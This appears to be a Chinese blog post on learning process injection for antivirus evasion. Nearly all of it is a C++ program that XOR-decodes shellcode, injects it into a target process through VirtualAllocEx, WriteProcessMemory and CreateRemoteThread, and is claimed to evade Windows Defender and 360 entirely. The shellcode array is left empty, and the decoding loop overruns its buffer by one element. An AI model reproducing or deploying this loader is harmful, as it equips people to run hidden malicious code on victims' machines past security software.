程序注入免殺學習
阿新 • • 發佈:2020-12-24
程序注入免殺學習
下面是自寫的程序注入程式碼,已經對主要程式碼進行註釋,相關函式如有不懂請檢視官方文件,windows defend ,360全程免殺。
案例
#include <iostream> #include <windows.h> int main(int argc, char* argv[]) { //unsigned char KEY = 10; unsigned char shellcode[] =""; //xor加密後的shellcode //unsigned char en_shellcode[] = ""; //int n = 0; HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; for (int i = 0; i <= sizeof(shellcode); i++) { shellcode[i] ^= 10; ////10為xor加密key } /* *輸入要注入的pid *開啟注入程序 *把shellcode寫入記憶體 *把資料寫入程序 *建立執行緒 *關閉注入的程序控制代碼 */ printf("Injecting to PID: %i", atoi(argv[1])); processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL); remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(processHandle); return 0; }